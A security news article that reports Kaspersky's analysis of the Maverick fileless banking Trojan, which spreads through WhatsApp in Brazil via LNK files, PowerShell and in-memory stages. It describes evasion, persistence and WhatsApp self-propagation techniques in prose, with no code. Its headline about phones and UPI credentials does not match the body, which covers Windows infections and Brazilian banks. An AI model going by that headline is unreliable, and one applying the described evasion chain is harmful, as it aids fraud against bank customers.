Maverick Fileless Trojan Turns Infected Phones into WhatsApp Worms to Steal Banking and UPI Credentials
Ddos 
Researchers from Kaspersky’s Global Research and Analysis Team (GReAT) have uncovered a massive fileless malware campaign targeting users in Brazil, which distributes a new and highly sophisticated banking Trojan dubbed Maverick via WhatsApp messages. The operation, which leverages automation tools, AI-generated code, and advanced encryption, is being described by Kaspersky as “one of the most complex infection chains we have ever detected.”
According to Kaspersky, the campaign spreads through malicious ZIP files shared via WhatsApp, containing a malicious .LNK shortcut file. Unlike executable attachments, LNK files are not blocked by the messaging platform, allowing attackers to bypass filters.
“A massive campaign disseminated through WhatsApp distributed the new Brazilian banking Trojan named ‘Maverick’ through ZIP files containing a malicious LNK file, which is not blocked on the messaging platform,” the researchers wrote.
When opened, the LNK file launches a PowerShell script that connects to a command-and-control (C2) server to download the next infection stage. To prevent casual probing, the C2 validates each request by verifying the User-Agent string, rejecting unauthorized connections.
“The C2 also validates the ‘User-Agent’ of the HTTP request to ensure that it is coming from the PowerShell command. Without the correct User-Agent, the C2 returns an HTTP 401 code,” Kaspersky explained.
All stages of the infection chain occur entirely in memory, using PowerShell, .NET assemblies, and Donut shellcode, making the attack fully fileless and exceptionally stealthy.
The Maverick Trojan shares notable code similarities with Coyote, a Brazilian banking Trojan previously analyzed by Kaspersky in 2024, but researchers believe it represents a new generation of threats.
“The new Trojan features code similarities with another Brazilian banking Trojan called Coyote; however, we consider Maverick to be a new threat,” the report states.
Maverick performs environmental checks to ensure it only infects Brazilian users, verifying timezone, language, and region settings before proceeding.
“The Maverick Trojan checks the time zone, language, region, and date and time format on infected machines to ensure the victim is in Brazil; otherwise, the malware will not be installed,” Kaspersky noted.
One of Maverick’s most alarming features is its ability to self-propagate via WhatsApp Web. Once installed, the malware uses WPPConnect, an open-source WhatsApp automation project, to hijack victims’ sessions and automatically send malicious messages to all contacts.
“Once installed, the Trojan uses the open-source project WPPConnect to automate the sending of messages in hijacked accounts via WhatsApp Web, taking advantage of the access to send the malicious message to contacts,” the researchers explained.
This propagation method turns every infected user into a distribution node, creating a worm-like infection model capable of spreading exponentially.
The Maverick Trojan specifically monitors 26 Brazilian banking websites, 6 cryptocurrency exchanges, and 1 payment platform. It can execute a range of malicious actions once a victim visits one of these sites:
- Take screenshots
- Install a keylogger
- Control the mouse and keyboard
- Block the screen during banking sessions
- Inject phishing overlays to steal credentials
“The banking Trojan can fully control the infected computer, taking screenshots, monitoring open browsers and websites, installing a keylogger, controlling the mouse, blocking the screen when accessing a banking website, terminating processes, and opening phishing pages in an overlay,” the report states.
Kaspersky analysts discovered that the Maverick malware employs artificial intelligence in parts of its code, including certificate decryption routines.
“The new Trojan uses AI in the code-writing process, especially in certificate decryption and general code development,” the researchers revealed.
Communication between infected machines and the C2 is protected using SSL tunnels and custom X.509 certificates, decrypted with the password “Maverick2025!”.
The Trojan also authenticates using a unique password — 101593a51d9c40fc8ec162d67504e221 — before it can receive commands such as SCREENSHOT, KEYLOGGER, or GENERATEWINDOWREQUEST, which prompts fake banking windows to harvest credentials
Maverick uses an innovative persistence mechanism that relies entirely on the availability of its C2 server. Instead of leaving large traces on disk, it creates a small batch script in the Startup folder, which retrieves the main payload from the C2 each time the system boots.
“Saving only the bootstrap .bat file ensures that the entire infection remains in memory. If persistence is achieved, it will start its true function, which is mainly to monitor browsers to check if they open banking pages,” the report explains.
Kaspersky’s telemetry indicates that the campaign has already had a massive impact in Brazil, blocking over 62,000 infection attempts in the first ten days of October 2025 alone.
“Our solutions have blocked 62 thousand infection attempts using the malicious LNK file in the first 10 days of October, only in Brazil,” the company said.
Although all known victims are in Brazil, researchers caution that the malware could easily spread abroad through WhatsApp’s global user base.
“All victims were in Brazil, but the Trojan has the potential to spread to other countries, as an infected victim can send it to another location,” Kaspersky warned.
Donate